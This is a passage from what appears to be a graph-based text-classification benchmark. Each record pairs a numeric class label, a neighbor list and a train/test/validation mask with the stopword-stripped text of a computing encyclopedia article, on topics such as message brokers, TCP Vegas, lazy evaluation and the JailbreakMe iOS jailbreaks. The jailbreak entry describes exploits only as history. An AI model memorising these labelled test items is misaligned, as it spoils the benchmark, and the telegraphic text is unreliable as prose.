    "text": "Message_broker:message broker message broker also known integration broker interface engine intermediary computer program module translates message formal messaging protocol sender formal messaging protocol receiver message brokers elements telecommunication computer networks software applications communicate exchanging formally-defined messages message brokers building block message-oriented middleware mom typically replacement traditional middleware like mom remote procedure call rpc message broker architectural pattern message validation transformation routing mediates communication among applications minimizing mutual awareness applications order able exchange messages effectively implementing decoupling primary purpose broker take incoming messages applications perform action message brokers decouple end-points meet specific non-functional requirements facilitate reuse intermediary functions example message broker may used manage workload queue message queue multiple receivers providing reliable storage guaranteed message delivery perhaps transaction management following represent examples actions might handled broker message brokers generally based one two fundamental architectures hub-and-spoke message bus first central server acts mechanism provides integration services whereas latter message broker communication backbone distributed service acts bus additionally scalable multi-hub approach used integrate multiple brokers",
    "neighbors": [
      1280,
      9225,
      1935,
      3983,
      9365,
      5403,
      1435,
      11038,
      8100,
      10020,
      8751,
      7347,
      3894,
      10565,
      6483,
      7256,
      5210,
      349,
      9441,
      9455,
      10236
    ],
    "mask": "None"
  },
  {
    "node_id": 6523,
    "label": 4,
    "text": "Shinken_(software):shinken software shinken open source computer system network monitoring software application compatible nagios watches hosts services gathers performance data alerts users error conditions occur conditions clear shinken architecture aims offer easier load balancing high availability administrator manages single configuration system automatically cuts parts dispatches worker nodes takes name functionality shinken japanese sword shinken written jean gabès proof concept new nagios architecture believing new implementation faster flexible old c code proposed new development branch nagios 4 proposal turned nagios authors shinken became independent network monitoring software application compatible nagios shinken designed run operating systems python runs development environment linux also runs well unix variants windows reactionner process responsible sending notifications also run android os free software licensed terms affero general public license published free software foundation shinken installation consists several processes optimized specific task multiple instances type process either single host spread many hosts adding processes automatically distributes load shinken webui builtin web interface provides near real time status information configuration interaction dashboard visualize trending data graphite databases visualization dependency tree graphs shinken skonfui independent web front-end used manage discovery process configuration tasks shinken-admin cli script used manage runtime process level aspects system changing logging levels getting health reports install.sh cli script main management script install remove update shinken associated software shinken open test-driven development approach contributors project providing new features code refactoring code quality bug fixing source code hosted github integration server runs tests commit depth tests regular intervals shinken documentation hosted wiki",
    "neighbors": [
      8582,
      6797,
      3218,
      5397,
      5402,
      6555,
      9245,
      4771,
      3629,
      7983,
      9909,
      823,
      1211,
      4797,
      3007,
      7364,
      8644,
      11221,
      10462,
      10341,
      8554,
      1776,
      5492,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6524,
    "label": 5,
    "text": "TCP_Vegas:tcp vegas tcp vegas tcp congestion avoidance algorithm emphasizes packet delay rather packet loss signal help determine rate send packets developed university arizona lawrence brakmo larry l. peterson introduced 1994 tcp vegas detects congestion incipient stage based increasing round-trip time rtt values packets connection unlike flavors reno new reno etc. detect congestion actually happened via packet loss algorithm depends heavily accurate calculation base rtt value small throughput connection less bandwidth available value large overrun connection lot research going regarding fairness provided linear increase/decrease mechanism congestion control vegas one interesting caveat vegas inter-operated versions like reno case performance vegas degrades vegas reduces sending rate reno detects congestion early hence gives greater bandwidth co-existing tcp reno flows tcp vegas one several flavors tcp congestion avoidance algorithms one series efforts tcp tuning adapt congestion control system behaviors new challenges faced increases available bandwidth internet components networks like internet2 tcp vegas implemented linux kernel freebsd possibly operating systems well",
    "neighbors": [
      10242,
      10115,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      2079,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      1835,
      10924,
      7983,
      562,
      2996,
      9909,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      9021,
      7364,
      2887,
      8391,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      7017,
      11112,
      367,
      8432,
      6651,
      1661
    ],
    "mask": "Test"
  },
  {
    "node_id": 6525,
    "label": 2,
    "text": "Frédéric_Lepied:frédéric lepied frédéric lepied born 1967 french computer engineer cto mandriva january 2006 born 1967 frédéric lepied took early interest computer science educated bréguet school noisy-le-grand france 1999 joined mandrakesoft research development team known author rpmlint rpm packages checker similar debian lintian program maintainer several core packages including xfree86 initscripts time wrote o'reilly book cvs 2000 maintained wacom tablet driver xfree86 x.org 2001 spent one year canada mandrakesoft montreal office became mandrakesoft cto came back france 2002 frédéric lepied left mandriva february 3 2006 joined intel corporation manage software manufacturers relationships late 2008 joined splitted desktop systems innovative hardware company chief strategy 2013 became vp software engineering enovance joining red hat 2015",
    "neighbors": [
      5096,
      1668,
      10192,
      9455
    ],
    "mask": "Test"
  },
  {
    "node_id": 6526,
    "label": 7,
    "text": "Toast,_Inc.:toast inc. toast inc. cloud-based restaurant software company based boston massachusetts company provides restaurant management point sale pos system built android operating system toast founded cambridge massachusetts 2012 steve fredette aman narang jonathan grimm 2016 toast received 30 million round series b funding bessemer venture partners gv formerly google ventures toast used thousands restaurants small cafes nationwide enterprises across u.s. toast founders steve fredette aman narang jonathan grimm met software company endeca graduating mit cambridge endeca acquired oracle 2011 left start toast grimm narang fredette initially created consumer app centered mobile payments customer loyalty promotions social aspects integrated restaurants ’ existing pos systems company started realize restaurants far needs able accept payments using phone tablet company pivoted full restaurant technology platform solutions pos online ordering gift cards analytics features two years later company signed 1,000 merchants across united states grew 120 employees requiring company upgrade space 7,000 square feet cambridge 40,000 square feet hatch fenway co-working space 2013 toast received investments several boston executives including former ceo endeca steve papa serves board member company early 2015 toast announced chris comparato chief executive officer comparato previously served senior vice president customer success acquia senior vice president worldwide customer solutions endeca august toast announced signed 1,000 customers two years revealing 550 year-over-year growth november toast released first restaurant report analyzed market restaurant technology well restaurant owners ’ challenges preferred technology features january 2016 toast received 30 million round series b funding bessemer venture partners gv previously known google ventures alphabet company funding led bvp partner kent bennett general partner android co-founder rich miner several undisclosed investors also participated round february 2018 needham-based tripadvisor partnered toast inc july 2018 company became one unicorn startup companies series round financing raising 115 million valuing company 1.4 billion first quarter 2019 company raised 250 million based valuation 2.7 billion equity raise led tcv tiger global management july 2019 toast acquired chicago-based human resources payroll software company stratex company also said would add additional 1,000 employees 2019 toast restaurant management system operates android operating system backend managed via mobile device via web browser real-time associated hardware includes receipt printer cash drawer kitchen display screen magstripe card reader 2015 merchant maverick named toast one best pos systems pizza parlors 2016 toast recognized notable player restaurant technology landscape pymnts.com may 2016 new england venture capital association nevca named toast winner hottest startup a+ 2016 nevy awards",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6527,
    "label": 9,
    "text": "Exception_safety:exception safety exception safety guarantees originally formalized david abrahams set contractual guidelines class library implementers clients use reasoning exception handling safety programming language uses exceptions particularly c++ several levels exception safety decreasing order safety usually least basic exception safety required write robust code languages higher levels safety sometimes difficult achieve might incur overhead due extra copying key mechanism exception safety codice_1 clause similar exception handling syntax ensure certain code always run block exited including exceptions several languages constructs simplify notably using dispose pattern named codice_2 codice_3 codice_4-with-resources consider smart vector type c++ java item added vector vector must actually add internal list objects update count field says many objects may also need allocate new memory existing capacity n't sufficient exception safety alternatives",
    "neighbors": [
      7274,
      716,
      4592,
      348,
      8382
    ],
    "mask": "Test"
  },
  {
    "node_id": 6528,
    "label": 5,
    "text": "Links_(web_browser):links web browser links open source text graphic web browser pull-down menu system renders complex pages partial html 4.0 support including tables frames support multiple character sets utf-8 supports color monochrome terminals allows horizontal scrolling intended users want retain many typical elements graphical user interfaces pop-up windows menus etc text-only environment original version links developed mikuláš patočka czech republic group twibright labs later developed version 2 links browser displays graphics renders fonts different sizes spatial anti-aliasing support javascript used version 2.1pre28 resulting browser fast display many pages intended graphical mode works even unix systems without x window system window environment using either svgalib framebuffer system graphics card graphics stack several peculiarities unusual web browser fonts displayed links derived system compiled binary grayscale bitmaps portable network graphics png format allows browser one executable file independent system libraries however increases size executable 5 mb fonts anti-aliased without hinting small line pitch artificial sharpening employed increase legibility subpixel sampling increases legibility lcd displays allowed links anti-aliased fonts time anti-aliased font libraries uncommon graphic elements images text first converted given gamma space according known assumed gamma information png jpeg etc known user gamma setting 48 bits per pixel photometrically linear space resampled bilinear resampling target size possibly taking aspect ratio correction account data passed high-performance restartable dithering engine used regardless monitor bit depth i.e. also 24 bits per pixel colour floyd-steinberg dithering engine takes account gamma characteristics monitor uses 768 kib dithering tables avoid time expensive calculations technique similar self-modifying code function templates used maximize speed dithering engine without using assembly language optimization non-portable images scaled also use subpixel sampling lcd increase level detail reason high quality processing provide proper realistic sampling images photorealistic display regardless monitor gamma without colour fringing caused 8-bit gamma correction built x server also increases perceived colour depth 24 bits per pixel links graphics drivers x server linux framebuffer svgalib os/2 pmshell atheos gui allows run graphics mode even platforms n't x server experimental/enhanced links elinks fork links led petr baudis based links 0.9 open development incorporates patches links versions additional extension scripting lua internet users hacked links another version links browser merged elinks features links 2 andrey mirtchovski ported plan 9 bell labs considered good browser operating system though users complained inability cut paste plan 9 snarf buffer last release hacked links july 9 2003 changes unreleased links also ported run sony psp platform pspradio rafael cabezas last version 2.1pre23_psp_r1261 released february 6 2007 beos port updated françois revol also added gui support also runs haiku",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      4728,
      637,
      1664,
      2182,
      10910,
      8351,
      4777,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      7943,
      5397,
      278,
      7965,
      1834,
      7983,
      2865,
      10057,
      11082,
      2893,
      8557,
      5492,
      3971,
      3462,
      8584,
      7572,
      5026,
      944,
      5054,
      6086,
      4048,
      5078,
      477,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      8700,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 6529,
    "label": 2,
    "text": "Time-sharing_system_evolution:time-sharing system evolution article covers evolution time-sharing systems providing links major early time-sharing operating systems showing subsequent evolution time-sharing developed late 1950s realization single expensive computer could efficiently utilized multitasking multiprogramming operating system allowed multiple users simultaneous interactive access typically individual user would enter bursts information followed long pauses group users working time pauses one user would filled activity others similarly small slices time spent waiting disk tape network input could granted users given optimal group size overall process could efficient user would use computer terminal initially electromechanical teleprinters teletype model 33 asr friden flexowriter 1970 progressively superseded crt-based units dec vt05 datapoint 2200 lear siegler adm-3a terminals initially linked nearby computer via current loop serial cables conventional telegraph circuits provided ptts specialist digital leased lines t1 modems bell 103 successors allowed remote higher-speed use analogue voice telephone network see details additional systems table relationships shown purpose grouping entries reflect influences e.g. os/2 influenced vax/vms ms-dos legacy x86 platform cambridge multiple-access system first time-sharing system developed outside united states",
    "neighbors": [
      7939,
      6148,
      10883,
      9991,
      1147,
      1804,
      4492,
      6797,
      8976,
      273,
      4114,
      6675,
      7188,
      789,
      8977,
      11539,
      25,
      5658,
      8474,
      8732,
      6557,
      2462,
      3358,
      4643,
      421,
      1702,
      6056,
      10668,
      557,
      2477,
      8879,
      7217,
      6706,
      10803,
      6837,
      7477,
      823,
      7733,
      4409,
      5562,
      8889,
      10040,
      573,
      8001,
      3650,
      11075,
      8388,
      3142,
      2120,
      9166,
      6352,
      7507,
      3156,
      2519,
      10458,
      11356,
      7134,
      10590,
      1121,
      9829,
      6248,
      8944,
      499,
      6772,
      3323,
      11390
    ],
    "mask": "Train"
  },
  {
    "node_id": 6530,
    "label": 4,
    "text": "Data_commingling:data commingling data commingling computer science occurs different items kinds data stored way become commonly accessible supposed remain separated cloud computing occur different customer data sits server data commingled present security vulnerability data commingling also occur due high speed data transmission mixing situation data one security level inadvertently purposely mixed data lower higher security level transmission portal portal vehicles wire fiber optics microwave various radio frequency transmission portals commingling cause breaches security become source legal issues entity corporation individual data commingling also occur personal computers personal software programs used business security government etc uses early formulation stages entities non-profit profit corporations llc llp etc. creation use stand-alone computers stand-alone networks absolutely unconnected involved individuals easiest safest way prevent data commingling",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 6531,
    "label": 5,
    "text": "Reliable_Server_Pooling:reliable server pooling reliable server pooling rserpool computer protocol framework management access multiple coordinated pooled servers rserpool ietf standard developed ietf rserpool working group documented rfc 5351 rfc 5352 rfc 5353 rfc 5354 rfc 5355 rfc 5356 terminology rserpool server denoted pool element pe pool identified pool element identifier pe id 32-bit number pe id randomly chosen upon pe registration pool set pools denoted handlespace older literature may denoted namespace denomination dropped order avoid confusion domain name system dns pool handlespace identified unique pool handle ph represented arbitrary byte vector usually ascii unicode name pool e.g downloadpool webserverpool handlespace certain scope e.g organization company denoted operation scope explicitly goal rserpool manage global internet pools within single handlespace due localisation operation scopes possible keep handlespace flat phs hierarchy contrast domain name system top-level sub-domains constraint results significant simplification handlespace management within operation scope handlespace managed redundant pool registrars pr also denoted enrp servers name servers ns prs redundant order avoid pr become single point failure spof pr operation scope identified registrar id pr id 32-bit random number necessary ensure uniqueness pr ids pr contains complete copy operation scope handlespace prs operation scope synchronize view handlespace using endpoint handlespace redundancy protocol enrp older versions protocol use term endpoint namespace redundancy protocol naming replaced avoid confusion dns abbreviation kept due handlespace synchronization enrp prs operation scope functionally equal prs fails pr able seamlessly replace using aggregate server access protocol asap pe add pool remove requesting registration deregistration arbitrary pr operation scope case successful registration pr chosen registration becomes pe home-pr pr-h pr-h informs prs operation scope registration deregistration pes also monitors availability pes asap keep-alive messages keep-alive message pr-h acknowledged pe within certain time interval pe fails answer within certain timeout assumed dead immediately removed handlespace furthermore pe expected re-register regularly re-registration also possible pe change list transport addresses policy information use service pool client — called pool user pu rserpool terminology — first request resolution pool ph list pe identities arbitrary pr operation scope selection procedure denoted handle resolution case requested pool existing pr select list pe identities according pool pool member selection policy also simply denoted pool policy possible pool policies e.g random selection random least-loaded pe least used first case necessary selection information pes selected randomly required maintain up-to-date load information second case selecting least-loaded pe using appropriate selection policy e.g possible equally distribute request load onto pool pes reception list pe identities pr pu write pe information local cache cache denoted pu-side cache cache pu select exactly one pe — using pool selection policy — establish connection using application protocol e.g http sctp tcp case web server using connection service provided server used case establishment connection fails connection aborted service usage new pe selected repeating described selection procedure information pu-side cache outdated pe identity may directly selected cache skipping effort asking pr handle resolution re-establishing connection new pe state application session re-instantiated new pe procedure necessary session resumption denoted failover procedure course application-specific ftp download example failover procedure could mean tell new ftp server file name last received data position ftp server able resume download session since failover procedure highly application-dependent part rserpool though rserpool provides far reaching support implementation arbitrary failover schemes session layer mechanisms make possible rserpool components configure automatically prs announce via udp ip multicast announces received pes pus prs allowing learn list prs currently available operation scope advantage using ip multicast instead broadcast mechanism also work routers e.g lans inter-connected via vpn announces — case e.g switched ethernet — heard processed stations actually interested information case ip multicast available course possible statically configure pr addresses following implementations known",
    "neighbors": [
      5472,
      6723,
      7364,
      9285,
      2887,
      6733,
      6740,
      5749,
      6746,
      11413,
      6682,
      3006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6532,
    "label": 6,
    "text": "IBM_SAN_File_System:ibm san file system ibm san file system distributed heterogeneous file system developed ibm used storage area networks many virtualization features included allowing heterogeneous operating systems access data file spaces write-in-place b-trees used db2 database later better known core btrfs ibm discontinued selling san file system april 2007 replaced ibm general parallel file system gpfs",
    "neighbors": [
      8772,
      1801,
      6153,
      6797,
      7983,
      6677,
      823,
      3323,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 6533,
    "label": 8,
    "text": "Matomo_(software):matomo software matomo formerly piwik pronounced free open source web analytics application developed team international developers runs php/mysql webserver tracks online visits one websites displays reports visits analysis matomo used 1,455,000 websites 1.3 websites known traffic analysis tools translated 54 languages new versions released regularly piwik released late 2007 replacement phpmyvisites full api support cleaner ui modern graphs better architecture better performance 21 november 2008 sourceforge.net announced availability piwik hosted application developers piwik selected sourceforge project month july 2009 august 2009 piwik named among best open source enterprise infoworld 2009 bossie awards december 2012 piwik started crowdfunding requested new features september 2013 matthieu aubry maciej zawadziński ceo clearcode founded piwik pro provided support features open source piwik clearcode bought matthieu aubry june 2016 become sole owner piwik pro january 2018 piwik officially renamed matomo",
    "neighbors": [
      3969,
      8644,
      5612,
      8941,
      7022,
      7983,
      6576,
      8914,
      11221,
      10262,
      1943
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6534,
    "label": 6,
    "text": "The_Circle_(file_system):circle file system circle peer-to-peer distributed file system written mainly python based chord distributed hash table dht development circle ceased 2004 supports file sharing instant messaging buddy lists internet relay chat model sending message channel personalized trust-based news service unusually supports dht implementation vulnerable denial service attacks circle homepage circle currently runs linux bsd windows mac os x",
    "neighbors": [
      8640,
      9762,
      5251,
      4229,
      2409,
      8554,
      6797,
      4725,
      823,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 6535,
    "label": 3,
    "text": "The_Hunt_for_Red_October_(1987_video_game):hunt red october 1987 video game hunt red october video game based book hunt red october released 1987 available atari st amiga apple ii apple macintosh zx spectrum msx commodore 64 ibm pc port apple iigs released 1989 player must navigate red october towards u.s. waters avoiding soviet navy game combination submarine simulator strategy game computer gaming world 1988 described excellent submarine simulator controlled entirely mouse replay value game also praised soviets change tactics game 1992 survey magazine wargames modern settings much negative giving game one half stars five stating probably turn purchasers wargame genre product",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6536,
    "label": 9,
    "text": "Lazy_evaluation:lazy evaluation programming language theory lazy evaluation call-by-need evaluation strategy delays evaluation expression value needed non-strict evaluation also avoids repeated evaluations sharing sharing reduce running time certain functions exponential factor non-strict evaluation strategies call-by-name however lengthy operations would appropriate perform time-sensitive operations handling user inputs video game benefits lazy evaluation include lazy evaluation often combined memoization described jon bentley writing efficient programs function value computed parameter set parameters result stored lookup table indexed values parameters next time function called table consulted determine whether result combination parameter values already available stored result simply returned function evaluated another entry added lookup table reuse lazy evaluation lead reduction memory footprint since values created needed however lazy evaluation difficult combine imperative features exception handling input/output order operations becomes indeterminate lazy evaluation introduce memory leaks opposite lazy evaluation eager evaluation sometimes known strict evaluation eager evaluation evaluation strategy employed programming languages lazy evaluation introduced lambda calculus christopher wadsworth programming languages independently introduced peter henderson james h. morris daniel p. friedman david s. wise delayed evaluation used particularly functional programming languages using delayed evaluation expression evaluated soon gets bound variable evaluator forced produce expression value statement codice_1 i.e assignment result expression variable clearly calls expression evaluated result placed codice_2 actually codice_2 irrelevant need value via reference codice_2 later expression whose evaluation could deferred though eventually rapidly growing tree dependencies would pruned produce symbol rather another outside world see delayed evaluation advantage able create calculable infinite lists without infinite loops size matters interfering computation example one could create function creates infinite list often called stream fibonacci numbers calculation n -th fibonacci number would merely extraction element infinite list forcing evaluation first n members list example haskell programming language list fibonacci numbers written haskell syntax codice_5 prepends element list codice_6 returns list without first element codice_7 uses specified function case addition combine corresponding elements two lists produce third provided programmer careful values required produce particular result evaluated however certain calculations may result program attempting evaluate infinite number elements example requesting length list trying sum elements list fold operation would result program either failing terminate running memory almost common eager languages statements evaluate lazy fashion evaluates evaluates true evaluate b otherwise evaluates c either b c evaluated conversely eager language expected behavior still evaluate e computing value f e even though e unused function f. however user-defined control structures depend exact syntax example j would evaluated eager language lazy language j would evaluated never lazy evaluation allows control structures defined normally primitives compile-time techniques j side effects introduce run time errors subtle differences l l complex usually possible introduce user-defined lazy control structures eager languages functions though may depart language syntax eager evaluation often involved code bodies like j need wrapped function value executed called short-circuit evaluation boolean control structures sometimes called lazy many languages offer notion infinite data-structures allow definitions data given terms infinite ranges unending recursion actual values computed needed take example trivial program haskell function numberfrominfinitelist value infinity infinite range actual value specifically specific value certain index needed list evaluated even evaluated needed desired index compound expression might form easilycomputed lotsofwork easy part gives true lot work could avoided instance suppose large number n checked determine prime number function isprime n available alas require lot computation evaluate perhaps n=2 mod n,2 ≠0 isprime n help many evaluations arbitrary values n. compound expression might form safetotry expression whereby safetotry false attempt evaluating expression lest run-time error signalled divide-by-zero index-out-of-bounds etc instance following pseudocode locates last non-zero element array elements array zero loop work l 0 case loop must terminated without attempting reference element zero array exist computer windowing systems painting information screen driven expose events drive display code last possible moment windowing systems avoid computing unnecessary display content updates another example laziness modern computer systems copy-on-write page allocation demand paging memory allocated value stored memory changed laziness useful high performance scenarios example unix mmap function provides demand driven loading pages disk pages actually touched loaded memory unneeded memory allocated matlab implements copy edit arrays copied actual memory storage replicated content changed possibly leading memory error updating element afterwards instead copy operation programming languages delay evaluation expressions default others provide functions special syntax delay evaluation miranda haskell evaluation function arguments delayed default many languages evaluation delayed explicitly suspending computation using special syntax scheme codice_8 codice_9 ocaml codice_10 codice_11 generally wrapping expression thunk object representing explicitly delayed evaluation called lazy future perl 6 uses lazy evaluation lists one assign infinite lists variables use arguments functions unlike haskell miranda perl 6 n't use lazy evaluation arithmetic operators functions default lazy programming languages haskell although default evaluate expressions demanded possible cases make code eager—or conversely make lazy made eager done explicitly coding something forces evaluation may make code eager avoiding code may make code lazy strict evaluation usually implies eagerness technically different concepts however optimisation implemented compilers called strictness analysis cases allows compiler infer value always used cases may render programmer choice whether force particular value irrelevant strictness analysis force strict evaluation haskell marking constructor fields strict means values always demanded immediately codice_12 function also used demand value immediately pass useful constructor field generally lazy however neither techniques implements recursive strictness—for function called codice_13 invented also pattern matching haskell 98 strict default codice_14 qualifier used make lazy python 2.x codice_15 function computes list integers entire list stored memory first assignment statement evaluated example eager immediate evaluation python 3.x codice_15 function returns special range object computes elements list demand elements range object generated needed e.g. codice_17 evaluated following example example lazy deferred evaluation python 2.x possible use function called codice_18 returns object generates numbers range demand advantage codice_19 generated object always take amount memory version 2.2 forward python manifests lazy evaluation implementing iterators lazy sequences unlike tuple list sequences instance python 2 .net framework possible lazy evaluation using class system.lazy class easily exploited f using lazy keyword force method force evaluation also specialized collections like microsoft.fsharp.collections.seq provide built-in support lazy evaluation let fibonacci seq.unfold fun x x x 0i,1i fibonacci seq.nth 1000 c vb.net class system.lazy directly used public int sum practical example // recursive calculation n'th fibonacci number public int fib int n public void main another way use yield keyword // eager evaluation public ienumerable int fibonacci int x // lazy evaluation public ienumerable int lazyfibonacci int x",
    "neighbors": [
      5120,
      10246,
      9,
      12,
      4111,
      8722,
      2069,
      1051,
      9245,
      8738,
      4134,
      5165,
      5168,
      5684,
      2103,
      2620,
      10819,
      8262,
      86,
      8799,
      1124,
      8293,
      7273,
      2666,
      8810,
      6767,
      8815,
      3705,
      2682,
      9871,
      7326,
      4769,
      9893,
      6828,
      11444,
      3263,
      2754,
      5833,
      727,
      7386,
      219,
      5342,
      7394,
      230,
      1768,
      3823,
      8435,
      9497,
      3876,
      6437,
      4392,
      4398,
      1333,
      10043,
      8000,
      4417,
      10049,
      2381,
      10581,
      11610,
      10083,
      8554,
      5494,
      10616,
      2938,
      10618,
      8582,
      1931,
      7076,
      5031,
      6074,
      7612,
      1982,
      2505,
      7627,
      5585,
      11219,
      6102,
      10198,
      3573,
      5623,
      2557
    ],
    "mask": "Test"
  },
  {
    "node_id": 6537,
    "label": 4,
    "text": "JailbreakMe:jailbreakme jailbreakme series jailbreaks apple ios mobile operating system take advantage flaws safari browser device providing immediate one-step jailbreak unlike common jailbreaks blackra1n redsn0w require plugging device computer running jailbreaking software desktop jailbreaking allows users install software approved apple ipod touch iphone ipad jailbreakme automatically includes cydia package management interface serves alternative app store cydia allows installation packages jailbreakme first version 2007 worked iphone ipod touch firmware 1.1.1 second version released august 2010 firmware 4.0.1 earlier third version released july 2011 ios versions 4.3 4.3.3 first jailbreak ipad 2 jailbreakme 3.0 used jailbreak least two million devices jailbreakme started 2007 originally used jailbreak iphone ipod touch running 1.1.1 version ios named iphone os using tiff exploit safari installed installer.app vulnerability used exploit patched apple 1.1.2 firmware tool also called appsnapp created group nine developers jailbreakme 2.0 star released comex august 1 2010 exploits vulnerability freetype library used rendering pdf files first publicly available jailbreak iphone 4 able jailbreak ios 3.1.2 4.0.1 iphone ipod touch ipad models current jailbreak activated visiting jailbreakme.com web page device safari web browser vulnerability used jailbreakme 2.0 patched apple ios 4.0.2 jailbreakme 3.0 saffron released july 6 2011 jailbreak ios devices ios 4.3-4.3.3 ipad 2 4.3.3 first publicly available jailbreak ipad 2 jailbreakme 3.0 exploits freetype parser security flaw similar jailbreakme 2.0 using form pdf file rendered mobile safari uses kernel vulnerability complete untethered jailbreak comex also released patch freetype flaw called pdf patcher 2 available free package installable via cydia days initial release beta tester leaked jailbreakme 3.0 public comex said twitter put time limit release final version quickly jailbreakme website looks similar downloading app store app includes blue button saying free turns green button word install pressed much like application app store tapping install safari closes cydia loads new app device fully jailbroken reboot necessary july 15 2011 apple released ios 4.3.4 gsm 4.2.9 cdma patch flaws used jailbreakme comex received pwnie award black hat conference 2011 best client-side bug work comex hired apple intern august 2011 jailbreakme 4.0 released tihmstar december 12 2017 exploits three serious vulnerabilities cve-2016-4655 cve-2016-4656 cve-2016-4657 already exploited spyware named pegasus mainly based homedepot semi untethered jailbreak released jk9357 homedepot targets 32 bit devices ios 9.1 ios 9.3.4 vulnerabilities used homedepot jailbreakme 4.0 patched apple ios 7.12 jailbreak hosted chris wade creator corellium jailbreak.me whilst technically semi-untethered jailbreak made fully untethered use tihmstar untetherhomedepot package totallynotspyware team jakeblair420 released 7 september 2018 jailbreakme-style exploit works 64-bit device running ios 10 jailbreakme 4.0 web browser induced sideload cydia using payload either meridian doubleh3lix hosted spyware.lol semi-untethered october 7 2011 conceited apps allowing comex use domain name hosting sold domain name jailbreakme.com allegedly unknown party saurikit acquired domain next day jailbreakme.com redirects cydia.saurik.com incompatible device",
    "neighbors": [
      4737,
      5636,
      9732,
      6539,
      7697,
      5138,
      6938,
      161,
      5927,
      7983,
      4283,
      2492,
      1346,
      2502,
      456,
      8783,
      464,
      2259,
      10838,
      4957,
      3293,
      2397,
      2275,
      9063
    ],
    "mask": "None"
  },
  {
    "node_id": 6538,
    "label": 1,
    "text": "Profit_impact_of_marketing_strategy:profit impact marketing strategy profit impact market strategy pims® project uses empirical data determine business strategies make difference success failure used develop strategies resource allocation marketing important strategic metrics market share product quality investment intensity service quality measured pims® strongly correlated financial performance one surprising findings factors work identically across different industries pims® yields solid evidence support common sense counter-intuitive principles gaining sustaining competitive advantage tom peters nancy austin pims project originally initiated senior managers general electric wanted know business units profitable others direction sidney schoeffler economics professor hired ge purpose pims project launched 1960s internal empirical study aim make ge different strategic business units sbus comparable since ge highly diversified time key factors sought would impact economic success regardless product particular return investment roi i.e profit per unit tied capital used measure success 1972 project transferred marketing sciences institute wing harvard business school extended companies 1976 american strategic planning institute cambridge massachusetts took charge project 1970 1983 roughly 2600 strategic business units sbus around 200 companies took part surveys provided key figures project today around 12,570 observations 4200 sbus pims associates london worldwide competence design centre pims® since 1990s part malik management fredmund malik st. gallen switzerland since 2005 pims project analysed data gathered identify options problems resources opportunities faced sbu based spread business across different industries hoped data could drawn upon provide business industry empirical evidence strategies lead increased profitability database continues updated drawn upon academics companies today pims® databases currently comprise 25,000 years business experience sbu level i.e customer interface takes place marketing investment decisions made sbu characterized hundreds factors period 3+ years including market share competitors customer preference relative prices service quality innovation rate vertical integration etc. well number market attractiveness factors fairly detailed income statement balance sheet employee data pims study 50 different core metrics regularly surveyed important presented characteristics business environment market attractiveness competitive strength supply chain fitness dynamics change economic success factors variables explained variables appear obvious pims® advantage providing empirical data defines quantitative relationships attributes would consider reasonable companies wishing use service provide detailed information main strategic business units including based data provided pims® provides four reports lancaster massingham ashford following factors correlate particularly strongly roi ros success factors investment intensity correlates negatively explains approx 15 one hand formal-analytical reason increasing investment intensity i.e investment volume relation sales depreciation volume relation sales depreciation intensity also increases thus profit decreases hand investment intensity high fixed assets increase urge also use capacities i.e increase output volume certain circumstances lower prices thus profit margin relative market share correlates positively explains approx 12 main reason positive influence relative market share economies scale higher market share larger production volume lower unit costs also explained experience curve moreover market share increases power vis-à-vis suppliers means better conditions achieved relative product quality correlates positively explains approx 10 important reasons positive correlation higher achievable prices premium products also higher willingness consumers buy high-quality services sales volume increases thus positively influences market share see another reason lower complaint costs overall factors surveyed explain 70 percent differences profitability successful unsuccessful business areas pims database measured variance clearly could argued database operating information gathered period 1970 1983 outdated however data continues collected participating companies pims argues provides unique source time-series data conclusions proven stable time also suggested pims heavily biased towards traditional metal-bashing industries car manufacturing perhaps surprising considering era majority surveys carried reality 2006 3,800+ businesses contained within database includes data consumer industrial service sectors also heavily weighted towards large companies expense small entrepreneurial firms resulted data collection method used generally larger firms prepared pay consulting fee provide survey data return access database compare business large businesses sbus mintzberg 1998 claims database dominated large established firms suitable technique assessing state rather getting page 99 criticism important one trying get average results across industries give us laws marketplace dubious enterprise sampling strategy important one wants obtain results representative → pims master database heart pims program includes 25,000 years business experience across broad spectrum industries worldwide 90 companies processed one-third manufacture consumer goods 15 manufacture capital goods remaining business units suppliers raw materials semi-finished products components accessories industry commerce trade services companies account less 10 total companies yet represent fairly large sample 250 strategic business units category half business units pims database market products services nationally united states canada 11 serve regional markets north america european companies also numerous today around 1,000 business units continental european countries 600 uk important criticism leveled pims fact causation implies correlation correlation imply causation one important findings pims program find statistically significant relationship profitability market share see buzzell gale 1987 empirical work conducted pims suggested high market share yielded high profitability correlation considered true causal relationship fact correlation imply causation multivariate correlation analysis high market share associated high profits high profits could associated high market share third factor common could caused correlation many analysts believe possible use statistical causality test determine causation whole problem correlation insufficient determine causation first place using another correlation used tests determine causation → connection market share already indicated frequent allegations correlations used pims investigations draw conclusions causal relationships i.e correlation equated causality however problem obvious examined detail development pims program backhaus et al formulate aptly primary field application regression analysis investigation causal relationships cause-effect relationships also refer relationships backhaus et al 2006 p. 46 emphasis original authors add following emphasized neither regression analysis statistical methods prove causalities beyond doubt rather regression analysis prove correlations variables necessary yet sufficient condition causality backhaus et al 2006 p.48 f. within framework pims studies thus possible determine causalities help time series analyses due availability data longer 